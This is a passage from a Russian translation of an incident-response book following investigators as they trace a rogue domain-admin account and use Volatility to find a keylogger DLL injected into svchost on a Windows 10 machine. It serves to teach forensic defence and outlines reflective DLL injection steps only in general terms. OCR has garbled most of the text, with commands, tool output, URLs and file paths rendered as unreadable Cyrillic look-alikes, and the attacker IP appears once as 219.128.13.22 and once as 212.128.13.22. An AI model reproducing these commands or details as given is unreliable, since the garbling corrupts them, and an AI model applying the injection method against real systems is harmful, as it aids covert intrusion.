привилегированной группы пользователей в ѴѴіпсІоѵѵз Асііѵе 
Оігесіогу. Время последнего входа близко к тому, что мы видели в 
мэйнфрейме, и совершенно точно находится за пределами времени 
рабочего дня в компании. 
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ПііР5://Ыоа5.іесПпе1тісго5о)1 сот/с) геѵѵ/201 6/1 2/23/іп5іаІІІпа-гетоіе-5егѵег-ас)тіп-іооІ5-г5аі-ѵіа-ро 

ѵѵегаНеІІ/ 






Мы выводим список других членов группы администраторов 
домена и сравниваем даты их создания: 


Р5> беТ-МеІіСгоирМешЬег -§гоирпате "сіотаіп асІтіпБ” -Тиіісіаііа | 5е1есТ 
пате,м!іепсгеаі:есІ 


пате 

ѵѵНепСгеаІегі 

а_ирсіаТе 

14/01/2017 05:00:01 АМ 

ас)т_гісНагсі 

06/21/2016 10:46:16 РМ 

ас)т_5иргеіпе 

02/17/2014 10:44:44 РМ 

асіт_]еппі-рег 

12/22/2010 10:44:44 РМ 

Агітіп'ізігаіог 

12/22/2010 9:27:40 РМ 


Очевидные различия! Все другие учетные записи 
администраторов существуют по меньшей мере 8 месяцев 
(некоторые даже несколько лет), при этом а_ирсІаѣе была создана 
буквально пару месяцев назад... в 05:00 утра по ІІТС! 43 

Мы просим администратора ѴѴіпсІоѵѵз идентифицировать 
человека или сервис, стоящих за учетной записью а_ирсІа1:е, но он 
вообще не может вспомнить о существовании этого аккаунта. Мы 
собираем экстренное совещание с кризисной группой. 

Эта новая находка имеет огромные последствия: обнаружен 
несанкционированный доступ в ѴѴіпсІоѵѵз Асііѵе Эігесіогу. 

У атакующего есть учетная запись администратора домена, 
что по сути означает, что он может (и вероятнее всего уже сделал 
это) шпионить за любым компьютером, включая машины 
руководящего состава компании, читать все электронные письма и 
конечно, получать доступ на любую ѴѴіпбоѵѵз-машину в сети. 

Как только мы сообщаем о текущем представлении 
произошедшего проникновения, люди начинают биться головами об 
стол. В буквальном смысле. 


43 Хотя на этот раз информация может быть не релевантной, старайтесь учитывать локальное 
время групп администраторов на случай, если они работают на аутсорсе. 19:00 в Европе может 
и не казаться подозрительным, но это время определенно будет находиться за пределами 
времени рабочего дня где-нибудь в Индии, например. 








Их фрустрация понятна. Если вы не можете доверять своим 
собственным системам, как можно защитить себя или дать отпор? 

У всех появляется желание удалить эту учетную запись в 
порыве приступа жажды мести, но вновь это не принесет никакой 
пользы, напротив, даст атакующему серьезную подсказку насчет 
прогресса в расследовании, и возможно, заставит его уничтожить 
все машины, используя другую учетную запись, до которой мы еще 
не добрались. 

Наша насущная проблема - не учетная запись; их может 
оказаться больше. Атакующий присутствует здесь уже несколько 
месяцев. Если мы оставим учетные записи еще на несколько часов, 
то это уже ничего не изменит. 

Наша приоритетная задача - организовать с командой клиента 
защищенный коммуникационный канал. Никаких больше 
электронных писем через стандартные адреса почты ОиІІоок. Для 
этих целей мы создаем несколько адресов на РгоіопМаіІ для всех. 
Все электронные письма между адресами РгоіопМаіІ автоматически 
шифруются. Этого хватит, пока что. 

Запрещаются все планшеты под ѴѴіпсІоѵѵз на время кризисных 
совещаний. Этого не избежит даже рабочая группа правления 
корпорации на этот раз. Ничто не мешает атакующему активировать 
камеру или микрофон любого компьютера в І_ео5ігаі, так что нам 
нужно быть осторожными. 

Пока выполняются эти действия, наша следственная группа 
продолжает свои операции. Нам нужно понять, какого черта этот 
пользователь а_ирсІа1:е делал на компьютере Барни, но что еще 
более важно, как этот пользователь туда попал. Время погрузиться 
в дамп памяти! 


Анализ памяти 


Чтобы проанализировать дамп памяти, который мы извлекли, 
мы воспользуемся фреймворком Ѵоіаѣіііііу, это инструмент на 
РуіИоп, с которым должен быть знаком любой специалист по работе 
с инцидентами. 44 Он поддерживает десятки операционных систем, 
начиная от ѴѴіпбоѵѵз ХР до Ыпих РесІІіаі. 45 

Мы начинаем с загрузки последней версии Ѵо1а1:і1і1:у с 
ѲііІиіЬ 46 , затем выполняем команду “іта§еіп-Ро”, чтобы определить 
правильный профиль памяти для использования: 


:~/ѵо1аі;і1і1:у руТЬоп ѵоі.ру -Т /гооТ/тетсІитр.тет ітаееіп-ро 


і Т(,!(,иагсі:-/ѵоіатііііу# руТЬоп ѵоі.ру -Т /гооТ/тетсІитр .тет ітадеіпТо 

ѴоІаТіІіТу РоипсІаТіоп ѴоІаТіІіТу Ргатеѵгагк 2.6 

ІМРО : ѵоІаТіІіТѵ .сІеЬиа : ОѳТегтіпіпа огоТіІе ЬазесІ оп КРВС зеагсН... 

ЗиддезТесІ РгоТіІе(з) 

Міп10х86_14393, Ѵ\/іп1Ѳх86_15Ѳ63 

АЗ Ьауегі 
АЗ І_ауег2 
РАЕ Туре 
РТВ 
КРВ6 

МитЬег оТ Ргосеззогз 
Ітаде Туре (Зегѵісе Раск) 
КРСК Тог СРІІ 0 
К1І5ЕВ_5Н АВЕ0_РАТ А 
Ітаде сІаТе апсі Тіте 
Ітаде Іосаі сІаТе апсі Тіте 

ІАЗ^РадеРМетогуРае (Кегпеі АЗ) 

РіІеАсІсІ геззЗрасе (/ гооТ/тетсІитр. тет) 

РАЕ 

Ѳх1а8ѲѲѲІ_ 

Ѳх81а7с36ѲІ_ 

1 

0 

Ѳх81аа2ѲѲѲІ_ 

0хТТсІТ0000Е 

2017-06-25 15:32:13 ІЯС+ѲѲѲѲ 

2017-06-25 08:32:13 -0700 


Чтобы найти основные объекты в памяти (процессы, сетевые 
соединения и так далее), Ѵоіаѣіііііу в значительной степени 
полагается на структуры данных, которые отличаются в 
зависимости от различных версий операционных систем. 


44 Если вы никогда не читали книгу “Агі оГ Метогу Рогепзісз” (“Искусство криминалистического 
анализа памяти”), бросайте все (включая эту книгу) и бегите читать. Настолько она хороша. 

ИИрз://\л/\л/\л/.ата2оп.сот/с1р/В00ЛЛ123ОС 

45 Дополнительные профили ѴоІаІІІІІу: Н1ірз://ді{НиЬ.сопі/ѵоІа1ІІІМоипсІа1іоп/ргоТІІе5 


46 б1{рз://ді1ІтиЬ.сопі/ѵоІаііІІМоипба1іоп/ѵоІаШііѵ 











Эти характеристики хранятся в профилях Ѵоіаѣіііііу 47 и как 
правило содержат: 

• Постоянные значения: адреса и смещения, жестко 

закодированные в важные структуры памяти. 

• Информация по системным вызовам: индексы и имена 

системных вызовов, специальные функции, которые 

выполняют низкоуровневые операции (ореп, геасі, іл/гі1:е, 
іпііеггирѣ и т.д.) 

• Нативные типы: размер іпіедег, Іопд, сНагасіег и т.д. 

Ввиду этого важно определить правильный профиль 48 , перед 
тем, как двигаться далее. В нашем случае, мы имеем 
ѴѴіп10х86_14393 для машины Барни (ѴѴіпсІоѵѵз 10, 32-бит, сборка 
14393). 

Первое, что нам нужно сделать, это подтвердить список 
процессов, которые мы извлекли ранее, при помощи стандартных 
инструментов. ѴѴіпсІоѵѵз отслеживает активные процессы, 
поддерживая двусвязный список объектов _ЕРКОСЕ55. 49 Каждый 
объект описывает работающий процесс: время создания, 
идентификатор процесса (РЮ), родительский РЮ (РРЮ), 
количество потоков и так далее. 

Сеі-ргосезз, Представление задач (Тазк Ѵіеѵѵ), Диспетчер 
задач и другие утилиты легко проходят по этому списку для 
отображения работающих программ. Малварь, которая искажает 
этот список (убирая связь своего процесса из списка, например), 
может скрывать себя от стандартных инструментов. 

47 ТакаМго Нагиуата и НігозМ Зигикі продемонстрировали, как нарушить работу инструментов 
для анализа памяти, подменяя ШВС (структуру, поддерживаемую ядром ѴѴіпсІоѵѵз для 
отладки), на которую большинство инструментов полагаются при создании своих “профилей” 
анализа. 

48 Для вывода списка всех поддерживаемых профилей, выполните команду на РуІГіоп: 
ѵоі.ру --іпію 

49 Первый объект ЕРРОСЕ55 хранится по указателю РзАсІіѵеРгосеззНеасІ в структуре КОВС, 
который можно найти по контрольным ключевым словам. 



Тем не менее, используя Ѵоіаіііііу, мы можем искать в 
памяти любую структуру, похожую на объект _ЕРК0СЕ55 (строка 
“ргос” со смещением 0, валидные указатели на ядро с 
определенными смещениями и так далее), чтобы обойти подобные 
трюки. Мы используем модуль р55сап, чтобы сделать это: 


:~/ѵо1а1і1і1:у руТНоп ѵоі. 

ру -Т /гооі/тетсіитр.тет р55сап -- 

ргоТі1е=Ыіп10х86_14393 



0ТТ5еі(Р) 

Мате 

РЮ 

Тіте ехіТесІ 

0х000000008бТ4е980 

ЗузТет 

4 


Ѳх000000008ааасІ64Ѳ 

КипТітеВгокег 

2760 


0х000000008сІ 95 5 Ь0Ѳ 

БеагсЫІІ.ехе 

3452 


0x000000008с! 9е1Ьс0 

БѵсИозІ: .ехе 

860 


0х000000008е с 2е800 

С5Г55.ехе 

356 


0хѲ00000Ѳ08еса4Ьс0 

Ѳк-Ріисііс. ехе 

3812 

2017-03-12 17:00:55 

0х0Ѳ0000008есЬ0Ьс0 

С5Г55.ехе 

432 


0x0000000096433480 

ТазкНовТм.ехе 

2608 


Ѳх00000000964а 7040 

иБегіпіТ.ехе 

2696 

2017-03-13 17:00:20 

0х0000000Ѳ964а9480 

ехріогег.ехе 

2848 


0х00000000964с!8880 

Міб5гѵ. ехе 

2320 


0x000000009653а 040 

[-] 

5т55.ехе 

412 

2017-03-13 01:59:38 


Вновь, время создания и родительский РЮ обрезаны, чтобы 
уместить результаты на странице. 

Обратите внимание, что используя этот метод сканирования 
памяти (или сканирование по тегам пулов), Ѵоіаіііііу может найти 
процессы и5егіпі1:.ехе и зшББ.ехе, даже несмотря на то, что они 
завершились после входа в систему. Но что самое интересное, он 
нашел третий процесс, уже не работающий, который сразу же 
бросается в глаза: Ѳк-Ріисііс.ехе 

Процесс завершился пару дней назад, когда Барни уже не 
пользовался своим компьютером... Мы пробуем вывести 
БИ-файлы, загруженные этим процессом, чтобы понять его 
предназначение, но получаем следующую ошибку: 



:~/ѵо1а1:і1і!у руТЬоп ѵоі.ру -Т /гооТ/тетсішпр.тет -- 
ргоТі1е=Міп1Ѳх86_14393 сііііібі: -р 


ѴоІаТГШіу РоипЦаТіоп Ѵоіаііііііу Ргатеѵлэгк 2.6 

рауіоасіі .ѳхѳ рісі: 3812 

ІІпаЬЗе Іо геасі РЕВ Рог Тазк. 
гоо1:(<іі_.іі :-/ѵоІаТіІіТу# | 


Невозможно прочитать РЕВ по задаче 

Структура блока окружения процесса (РЕВ) 50 хранит указатели 
на список ОН, текущую рабочую директорию и другую полезную 
информацию. Поскольку процесс завершился, ѴѴіпсІоѵѵз, должно 
быть, пометил объект как свободный и готовый к получению новых 
данных. 

К счастью для нас, основные заголовки структуры _ЕРК0СЕ55 
не были изменены, вот почему Ѵоіаѣіііѣу смог получить их. Но 
РЕВ-указатель уже перезаписан новыми данными, что затрудняет 
нам движение дальше. 51 

Что насчет сетевых соединений? Если малварь была 
сброшена злоумышленником извне или общалась с удаленным 
сервером, должен был открываться сетевой сокет в системе. 

Это не обязательно будет отображаться по команде пеѣзіаі в 
силу различных причин: соединение закрылось, когда мы запустили 
команду, подмена внутренних ЭИ, подмена внутренних структур 
(Непосредственное изменение объекта ядра - ЭКОМ) и так далее. 


50 ГіНрз://уѵѵѵ\/ѵ.аео1ТсІіарреІІ.сот/з1ис]іез/\/ѵіпсІоѵѵз/\/ѵіп32/п1сІІІ/з1гис1з/реЬ/іпсІех.Іі1т 

51 Некоторые вредоносные файлы изменяют свою РЕВ-структуру, чтобы затруднить получение 
списка ОІ_І_ и другой информации. Если это повстречается вам, используйте плагин ѵабіпГо для 
вывода памяти, принадлежащей процессу, и анализа фрагментов, помеченных как 
РАОЕЕХЕСІІТЕРЕАО. 

(прим, переводчика: 

ИНр5://аі1ІтиЬ.сот/ѵоІа1:ІІІ1ѵ1 : оипсіа{іоп/ѵоІа1ІІІ1ѵ/ЫоЬ/та5Іег/ѵоІа1:ІІІ1ѵ/рІиаіп5/ѵасІіп< : о.рѵ) 







Но есть шанс, что объект памяти, описывающий это соединение, 
по-прежнему где-то болтается в памяти. 

ѴѴіпсІоѵѵз отслеживает открытые соединения, создавая 
односвязную цепочку объектов _ТСР_ЕМ0Р01МТ. Каждый объект 
описывает свойства соединения: локальные и удаленные порты, 
удаленный адрес, состояние соединения и так далее. Когда 
соединение завершается, соответствующий объект удаляется из 
связного списка. Но как уже говорилось ранее, он не стирается 
немедленно из памяти. 


Плагин пеѣзсап в Ѵоіаѣіііііу ищет эти остаточные объекты 
по ряду специфических характеристик (объекты _ТСР_ЕМ0Р01МТ 
начинаются с “ТсрЕ” и имеют размер структуры, превосходящий 496 
байт 52 , а также валидные указатели ядра с ключевыми 
смещениями). 


:~/ѵо1а*і1И:у руТНоп ѵоі.ру -Т /гооТ/тетсІитр.тет — 
ргоТі1е=Ыіп10х86_14393 пеТБсап 


Ргою 

ЬосаТ. Асісігезз 

Рогѳідп Асісігезз 

Зіаіе 

РІСІ 

Оѵѵпег 

ІЮРѵ4 

0.0.0.0:0 

* . Ж 


868 

зѵсЬозІ .ехе 

ІЮРѵб 

: : :Ѳ 

ж . Ж 


868 

зѵсЬозІ: .ехе 

ІЮРѵ4 

0.0.0.0:512 

ж . ж 


868 

зѵсЬозІ: .ехе 

ІЮРѵ4 

0.0.0.0:512 

ж . ж 


868 

зѵсЬозІ: .ехе 

ІЮРѵ4 

0.0.0.0:0 

ж . ж 


868 

зѵсііозі: .ехе 

ІЮРѵб 

:: :Ѳ 

ж . ж 


868 

зѵсЬозІ: .ехе 

ІЮРѵ4 

0.0.0.0:512 

ж • ж 


868 

зѵсЬозІ: .ехе 

ІЮРѵ4 

0.0.0.0:512 

ж . ж 


868 

зѵсЬозІ.ехе 

ІЮРѵ4 

0.0.0.0:0 

ж . ж 


2164 

зѵсЬозІ: .ехе 

ІЮРѵб 

:: :Ѳ 

ж . ж 


2164 

зѵсЬозІ: .ехе 

ІЮРѵ4 

0.0.0.0:0 

ж . ж 


2164 

зѵсЬозІ: .ехе 

|ТСРѵ4 

192.168.1.25:49673 

219.128.13.22:443 


860 | 

зѵсііозі: .ехе 


0.0.0.0:0 

ж . ж 


860 

зѵсііозі: .ехе 

іюрѵб 

:: :Ѳ 

ж • ж 


860 

зѵсЬозІ.ехе 

ІЮРѵ4 

0.0.0.0:0 

ж ■ ж 


928 

зѵсЬозІ.ехе 

ІЮРѵ4 

192.168.1.25:512 

ж . ж 


2564 

зѵсЬозС.ехе 

ІЮРѵ4 

0.0.0.0:5888 

ж . ж 


868 

зѵсЬозІ: .ехе 

ІЮРѵб 

:::5888 

ж . ж 


868 

зѵсЬозІ: .ехе 

ІЮРѵ4 

0.0.0.0:512 

ж . ж 


868 

зѵсЬозІ: .ехе 

ІЮРѵ4 

0.0.0.0:0 

ж . ж 


548 

Ізазз.ехе 

ІЮРѵб 

:: :Ѳ 

ж • ж 


548 

Ізазз.ехе 


Интересно. Наконец-то что-то стоящее! То, что может 
показаться простым НТТРз соединением, на деле - полная дичь, 
если вы немного поразмыслите, какого вообще черта процесс 

52 НіЬ5://аііНиЬ.сот/ѵоІаііІІМоипсІаііоп/ѵоІаШІМэІоЬ/та5іег/ѵоІаііІІЬ//рІидіп5/пеі5сап.рѵ 













зѵсііозіі.ехе нуждается в контакте с удаленным сервером... в Китае 
(219.128.13.22), 


:~# мГюіз 219.128.13.22 
% [ѵ4юіз .арпіс .пѳГ] 

% ИГюіз сІаТа соругідИІ: Тегтз ГіТТр ://ѵлл»/.арпіс .пеГ/сІЬ/сІЬсоругідІтС .ГіГтТ 
% ІпГогтаГіоп геТаТесІ го '219.128.0.0 - 219.137.255.255' 

% АЬизе сопТасТ 'Гог '219.128.0.0 - 219.137.255.255' із 'апГі-зрат@пз .сГйпапеГ .сп .пег ' 

іпѳГпит: 219.128.0.0 - 219.137.255.255 

пѳГпате: СНІІ\ІАІ\ІЕТ-СО 

сіѳзсг: СНINАNЕТ биапдсіопд ргоѵіпсе пеГѵѵогк 

сіѳзсг: РаТа СотшипісаГіоп Ріѵізіоп 

сіезсг: СГііпа Теіесот 

соипГ гѵ :_СИ_ 


Бѵсііобі: - это доверенная программа, используемая в ѴѴіпсІоѵѵз 
для загрузки ОН, которые реализуют службы (брандмауэр, 
планировщик задач и т.д.). В большинстве случаев она никак не 
связана с инициацией сетевых соединений, особенно на удаленные 
ІР-адреса. Давайте взглянем на подгружаемые ЭІ_І_, используя 
плагин сііііібі:: 


: ~/ѵо1аі:і1і1;у руТЬоп ѵоі.ру -Т /гооТ/тетсІитр.тет -- 
ргоТі1е=Міп1Ѳх86_14393 СІ111І5І: -р 860_ 


СоттапсІ Ііпе : С :\МіпсІоѵі/5\5узГет32\5ѵсГіо5Г .ехѳ -к ВРС55 


Вазе 

ЗІ2Ѳ 

ЕоасІСоипГ 

ѲхѲѲсЭѲѲѲѲ 

0ХС000 

ѲхГГГГ 

0x77050000 

0x186000 

ѲхГГГГ 

Ѳх74ѳеѲѲѲѲ 

0x96000 

ѲхГГГГ 

0Х744Г0000 

Ох1а700О 

ѲхГГГГ 

0х759Ь0000 

0x41000 

0x6 

0x74910000 

ѲхсЗѲѲѲ 

0x6 

0x74410000 

ѲхеѲѲѲѲ 

0x6 

Ѳх72с60ѲѲ0 

0x12000 

0x6 

0Х72Г10000 

0ХІ0000 

0x6 

0х74е?ѲѲОѲ 

йхЬрООВ 

0x6 


2017-07- 

2017-07- 

2017-07- 

2017-07- 

2017-07- 

2017-07- 

2017-07- 

2017-07- 

2017-07- 

2017-07- 


13 01 
13 01 
13 01 
13 01 
13 01 
13 01 
13 01 
13 05 
13 05 
13 05 


59:39 

59:39 

59:39 

59:39 

59:39 

59:39 

59:39 

30:32 

30:32 

30:32 


ЛС+ѲѲѲѲ 

ІІТС+ѲѲѲѲ 

ілс+ѳѳѳѳ 

ІІТС+ѲѲѲѲ 

ІІТС+ѲѲѲѲ 

ІІТС+ѲѲѲѲ 

ІІТС+0ѲѲ0 

ІІТС+ѲѲѲѲ 

ІЛС+ѲѲѲѲ 

птс+оооо 


РаТГі 


СЛМіпсІоѵі/зХзузГетЗгЧзѵсГіоБГ .ехе 
СЛѴі/іпсІомзЧЗУЗТЕМЗгХпГсІТТ .сПЛ 
С: ЧМіпсІом5Ч5у5Тет32ЧКЕКІ\ІЕІ-32. РІ.1- 
С: ЧѴіІіпсІомзЧЗузГетЗгЧКЕКМЕІВАЗЕ. сПЛ 
С: ЧЫіпсіо\л(зЧЗу5І:ѳт32Ч5ѳсЬо5І:. сПЛ 
С :ЧМіпсІоѵі(зЧЗу5Гет32ЧКРСКТ4 .сІТТ 
С :ЧѴіІіпсІощ5ЧЗу5Гет32Чис гГЬазѳ ,сІ11 


с ЛміпсІоѵѵзЧзузТетЗгЧѴі/ІЧІІІЧЕТ.сГІІ. 
С:ЧМіпсІоѵѵзЧЗѴЗТЕМ32Ч0№АРІ .сіи 
С : ХІУі пгІпцзХЗѵзТ йтЗ?Ч шзмзог к .ГІП 


Есть 238 ЭІ_1_-файлов для анализа! Это не удивительно, 
учитывая роль процесса 5ѵсИо5І:.ехе. Столбец І_оасІСоип1: 
показывает, сколько раз функция І_оасІІ_іЬгагу() вызывалась 
программой для загрузки ЭИ в свое пространство памяти. 





Количество загрузок ОхРРРР (-1 в бііогѢ іп1;е§ег) означает, 
что ОН находилась в Таблице адресов импорта (ІАТ) исполняемого 
файла и поэтому загружалась на старте. 

Это вполне нормально, когда процесс подгружает 
дополнительные библиотеки во время выполнения, используя 
І_оасІІ_іЬгагу() для выполнения специфических функций, но когда 
5ѴСІЮ5І: грузит сетевые функции, экспортируемые из ІлІіпіпеѣ.сІІІ, 
ОІУІБАРІ.сІІІ и МБІлІзоск.сІІІ - это странно. 

Это указывает на сетевое соединение, которое мы 
идентифицировали ранее. Но это не объясняет, как удалось 
развести зѵсііозі: на их загрузку. Действительно, все отмеченные 
ЭИ являются легитимными файлами ѴѴіпсІоѵѵз (стандартные 
директории, стандартные файлы), поэтому вредоносный код, 
должно быть, ошивается где-то в другом месте. 

**Примечание по 

Почему мы всегда фокусируемся на динамически 
подключаемых библиотеках при проведении криминалистического 
анализа? Разве не может программа содержать всю свою 
вредоносную полезную нагрузку внутри своего основного 
исполняемого кода? 

Разработчики малвари, как и любые другие разработчики, 
стараются следовать модульному принципу: возможность 
обновлять компоненты программы по желанию, загрузка только 
необходимых модулей для выполнения определенных задач и так 
далее. ЭИ - это лучший способ добиться подобной гибкости. 

Кроме того, гораздо проще спрятать ЭИ внутри легитимного 
процесса, чем закидывать драйвер ядра, который изменяет связные 
списки в памяти, чтобы скрыть несколько процессов. Это более 
стабильно, и ѴѴіпсІоѵѵз предоставляет нативные АРІ для этого. 


**** 


Давайте повторим основы. Плагин сііііізі:, как тонко 
намекает его название, выводит список ОН, на которые ссылается 
указатель ІпІ_оасІОгсІег в РЕВ-структуре. 53 Каждая ОН, загруженная 
при помощи функции І_оасІІ_іЬгагу, оказывается в этой структуре. 

Может ли атакующий внедрить код в память другого процесса 
без официальной регистрации ОН? Конечно. Обычно это 
происходит примерно так: 

• Во-первых, мы присоединяемся к целевому процессу (функция 
ОрепРГОСѲББ). 

• Далее мы выделяем память внутри целевого процесса для 
записи кода ОН (ѴігѣиаІАІІохЕх и Ыгі1:еРгосе55Метогу). 

• И наконец, мы инструктируем программу перейти к 
загруженному фрагменту кода (ІУІ1:Сгеа1:еТІігеасІ), который 
выполнит перемещение базового адреса, загрузку других 
необходимых ОН и так далее. 

Вы сможете найти больше подробностей об этом методе под 
названием ЭИ-инъекции с отражением (НеЯесііѵе ОН іпіесііоп) по 
следующей ссылке 54 , но что замечательно в нем, так это то, что ОН 
не регистрируется официально и таким образом будет невидимой 
для большинства инструментов мониторинга. 

Это действительно скрытный метод, но обычно у него есть 
один очевидный явный признак. Фрагмент памяти, содержащий 
вредоносный код, требует наличия трех атрибутов во время 
инъекции: КеасІ, Ыгіііе и Ехесиіе. 


53 Вообще говоря, есть три списка в РЕВ, ссылающиеся на ОІ_І_: іпіоабогсіег, іптетогсіег и 
іпіпііогсіег. 


54 Н1ір://Ыод.ореп5есигі1ѵге5еагсН. сот/2013/01 Ал/іпсіоѵѵв-сіІІ-іпіесІіоп-Ьавісз.ІтІтІ 




Код ОН должен быть записан в пространство памяти, и он 
должен быть прочитан и выполнен процессом. В этом имеется 
смысл. Но в окружении ѴѴіпсІоѵѵз подобный тип доступа к памяти 
крайне редок. 

Страницы памяти обычно имеют либо флаги КеасІ и Ехесиііе, 
либо флаг Ыгіііе. А не все три одновременно. Плюс, в довершении 
ко всему, выделенные страницы памяти помечены как приватные - 
как не имеющие под собой физического файла на диске. Очень 
странно для ОН... 

Плагин таІ-РіпсІ в Ѵоіаѣііііу использует все эти артефакты 
(и многие другие) для обнаружения подобных подозрительных 
страниц памяти. 

Он парсит дескрипторы виртуальных адресов (ѴАО 55 ), которые 
отслеживают страницы памяти, выделяемые каждым процессом, и 
ищет подозрительные комбинации атрибутов (КеасІ, Ілігіѣе и 
Ехесиііе, Ргіѵаѣе и проч.), а также другие вызывающие тревогу 
моменты, указывающие на инъекцию кода. Мы запускаем этот 
плагин для процесса зѵсіюзіі.ехе: 


:~/ѵо1а1:і1і1:у руТЬоп ѵоі.ру -Т /гооТ/тепкІитр.теш 
ргоТі1е=Міп10х86_14393 -р 860 таГРіпсІ -Р /гооТ/оиТриТ/ 


Ргосезз: зѵсРозІ: .ехе РісІ: 860 Асісігезз: 0x9200000 
ѴасІ Тад: ѴасІЗ РгоТѳсТіоп: РА6Е_ЕХЕСІІТЕ_РЕАЭШІ ТЕ 
Еіадз: РгіѵаТеМетогу: 1, РгоТѳсТіоп: 6 

0x09200000 46 5а е8 00 00 00 00 5Ь 52 45 55 89 ѳ5 81 сЗ 62 М2.[КЕІІ_Ь 

0x09200010 17 00 00 ТТ сІЗ 81 сЗ 97 82 Ѳе 00 89 ЗЬ 53 6а 04 .;5] . 

0x09200020 50 1=1= сІ0 00 00 00 00 00 00 00 00 00 00 00 00 00 Р. 

0x09200030 00 00 00 00 00 00 00 00 00 00 00 00 1=8 00 00 00 . 

0x09200000 46 ОЕС ЕВР 

0x09200001 5а РОР ЕОХ 

0x09200002 е8ѲѲѲѲѲѲѲѲ САН 0x9200007 

0x09200007 5Ь РОР ЕВХ 

0x09200008 52 Р1І5Н ЕОХ 


55 Менеджер памяти ѴѴіпсІоѵѵз использует дерево дескрипторов виртуальных адресов для 
предоставления эффективного поиска страниц памяти, используемых процессом. 










Кажется, он нашел что-то интересное по базовому адресу 
0x9200000. Ключевое слово М2 56 обычно указывает на запуск 
исполняемого файла ѴѴіпсІоѵѵз. 

Определенно, была какая-то инъекция кода в адресное 
пространство зѵсИозѣ. Переключатель “-0” снимает дамп этих 
подозрительных регионов памяти в файлы, которые мы можем 
отправить команде по реверс-инжинирингу для дальнейшего 
анализа. 

По всей видимости, малварь не фрагментирована по 
различным страницам памяти, поэтому Ѵоіаѣіііііу может легко 
реконструировать оригинальный исполняемый файл. 57 

Плагин таі-ріпсі автоматически попытается 

дизассемблировать код, собранный в подозрительных регионах. 
Это не важно для нашего сценария, потому что у нас имеется 
целый исполняемый модуль, внедренный в память, несколько 
первых байтов являются частью заголовка 003. 

Однако, если бы мы имели дело с зИеІІсосІе-инъекцией, 
процесс дизассемблирования помог бы нам исключить 
ложноположительные результаты (команды, которые не имеют 
никакого смысла, команды ИМР в свободные регионы памяти и так 
далее). 

**Примечание по обфускации** 

Вот чем хорош криминалистический анализ памяти: нам не 
приходится иметь дело с упаковкой, обфускацией и шифрованием. 


56 М2 расшифровывается как Магк 2Ьіко\л/зкі, это один из разработчиков МЗ-ООЗ. 

57 Интересный анализ фрагментированного кода: 

ННр5://ѵоІаііІііѵ-ІаЬ5. Ыодвроі. сот/2012/1 0/геѵег5е-епдіпеегіпд-роІ5оп-іѵѵ5.І~іітІ 




Картина, которую мы получаем из памяти, это 
непосредственный код в открытом тексте, свободный от 
практически всех трюков, используемых атакующим. 

По этой причине есть больше шансов, что он будет 
зафиксирован любым антивирусным программным обеспечением с 
достаточно хорошей базой данных сигнатур. 


**** 


Для быстрого осмотра файла мы загружаем его на 
ѵѵѵѵѵѵ.ѵігизіоіаі.сот . который прогонит его через 61 антивирусный 
движок 58 : 


Ш Апаіузіз О. Рііе сіеіаіі 

X Реіаііопзііірз О АсИіііопаІ іпГогтаІіоп Щ Соттепіз 

Ѵоіез 

Апііѵігиз 

КезиІІ 


АедізІ_аЬ 

Тгоі.ѴѴ32.Сепегіс!с 


Апііу-АѴІ. 

Тгоіап/ѴѴІп32.АСепѳгіс 


Аѵіга (по сіоисі) 

ТК/Зру.Сеп 


Ваісіи 

ѴѴіпЗг.Тгоіап.ѴѴізсіотЕуез. 16070401.9500.9853 



Уровень обнаружения достаточно низок (7/61), но все же 
подтверждает наши подозрения о вредоносной природе программы. 
Аѵіга классифицирует ее как зруѵѵаге (шпионское ПО), что 
полностью подходит под наш сценарий с похищением учетных 
данных. 

Мы можем далее подтвердить это поведение путем поиска 
классических функций ѴѴіпбоѵѵз, используемых кейлоггерами: 


:~/ѵо1а*і1і*у 5Тгіп§$ ргосе55.0х93Ь73400.* |§гер -і -Е 
"Се1:А5упсКеу$1:а1:е 1 5еіІлІіпсІоы$НоокЕх | МН_КЕѴВОАКй | ЫН_КЕѴВ0АК0_І_1 1 СеІКеуЬоагсІБІаІ:" 


58 Другой полезный ресурс: НіЬ5://ѵѵѵѵѵѵ.НѵЬгісІ-апаІѴ5І5.сот/ 







:~/ои1:ри1;# з'Ьгіпдз ргосезз.Ѳх93Ь734ѲѲ .* |дгѳр -Е "Се1:АзупспКѳу5і:а1:е 15е1:МіпсІс 
Сеі: Азу пс пКеу 51; а* е 
Сеі; Азу пс пКѳу 51; аі: е 

бѳТіАзупспКеуЗІіаІіе_ 


(Прим, переводчика: на данном скриншоте, взятом из оригинальной книги, 
опечатка; правильное название функции: СеіАзупсКеу8іаіе) 

Вот так сюрприз! 

Функция Се1:А5упсКеу51:аѣе отслеживает нажатия клавиатуры 
и повсеместно используется вредоносными программами для 
реализации возможностей кейлоггинга. В отличие от 
БеІіІлІіпсІоіл/зНоокЕх, нет нужды в инъекции вредоносного кода в 
большинство процессов, что немного затрудняет обнаружение в 
процессе форензик-экспертизы. 

Теперь, когда мы точно знаем, как была взломана учетная 
запись Барни в мэйнфрейме, мы отправляем сэмпл команде по 
реверс-инжинирингу и продолжаем расследование. 

Нам нужно приготовить список объектов для проверки на 
других компьютерах, чтобы оперативно узнать, подверглись ли они 
точно такому же заражению или нет. Пока что у нас есть ІР-адрес 
(212.128.13.22) и имя учетной записи (а_ирсІа1:е), но можно 
поискать и что-нибудь еще. 

Мы можем начать с вывода списка всех файлов, которые были 
открыты процессом зѵсііозѣ во время его выполнения. Используем 
плагин ІіапсІІез и определяем тип, который будем искать. 


:~/ѵо1аТі1і1:у руТЬоп ѵоі.ру -Т /гооТ/гпетсІитр.тет -- 
ргоТі1е=Ыіп1Ѳх86_14393 НапсІІез -1: Тііе -р 860_ 




Роипсіагіоп 

Ѵоіаіііііу Ргатеѵѵогк 2.6 


Рігі 

НапсІІе 

Ассезз Туре 

Реіаііз 

860 

ѲхЗс 

0x100020 Рііе 

\0еѵісе\НагсІс1ізкѴо1ите2\\д/іпсІо\л/з\Зузіеіп32 

860 

Ѳхбс 

0x100001 Рііе 

\Реѵісе\СМ6 

860 

0ХС0 

0x120089 Рііе 

\Реѵісе\НагсІсіізк\/о1ите2\1д/іпсІо\й/з\Зу5іеіті32\еп-1ІЗ\зѵс 

860 

0x164 

0x120089 Рііе 

\Реѵісе\ОеѵісеАрі\СМАрі 

860 

ѲхЗас 

0x16019! Рііе 

\Оеѵісе\АісІ\ЕпсІроіпі 

860 

0x460 

0x12019! Рііе 

ХОеѵісеХММЮаіаОеѵісе 

860 

0x464 

0x1 Рііе 

\Оеѵісе\Рсѵ\Югѵ 

860 

0x41=0 

0x100003 Рііе 

